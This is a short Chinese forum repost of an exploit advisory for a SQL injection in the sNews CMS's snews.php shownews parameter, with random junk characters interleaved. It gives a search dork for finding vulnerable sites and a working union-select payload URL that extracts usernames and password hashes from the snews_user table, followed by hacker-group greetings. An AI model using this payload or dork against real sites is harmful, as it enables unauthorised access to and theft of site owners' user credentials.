标题: CMS snews SQL Injection Vulnerability
; {3 A" X6 a3 {9 B& d作者: By onestree' [) ?4 h! m: @+ R, I: t) z
下载地址 : http://snewscms.com/* O1 m" I( _* ?% v' M/ |
测试平台 : ubuntu 12.10 / win 7
7 v* T- w( d9 {关键词: inurl:"tanyakan pada rumput yang bergoyang"5 Q" k9 a' T0 e7 i
3 Q8 D) U3 {* u4 N
0 _3 ]4 b; L) }( o; C
************************************************************* e* r& [4 \( n: i/ R% T& h
5 J% j6 s8 t X
SQL poc:
! _7 r* q0 x1 ~% m% ? 7 m' F3 @# {" _8 n
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
9 C6 A, t3 A) H) Q/ \: v - [3 K' ^" [% c4 |' e9 a
示例4 [$ D- x9 H5 a3 p( f0 [$ Z+ F
0 b. K9 d2 m0 f" U! Z5 D( R' H' N# Qhttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
) c! O) I6 l! O9 B! X* ^ % i& Z1 J6 m5 q6 V7 K
8 u* d' [3 F: ?' c致谢:5 `$ d6 y2 G- P4 G6 V6 Y6 k' b
4 ^3 q9 ?& [2 C- ^$ ~; V! M
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
, E' t) _. [, x3 F
# e) L6 U3 |- ~- r+ H8 E indonesiancoder - moeslimh4x0r - go-coder
7 d B8 @- c- ]9 K: a5 s7 F8 { " l4 m1 H* G$ O& k6 I& N# W4 @* s! x- k
spesial my hunny :*) o! d2 G- ?% B. Y$ z, t2 K. K
|
发表于 2013-1-23 08:55:06
收藏
支持
反对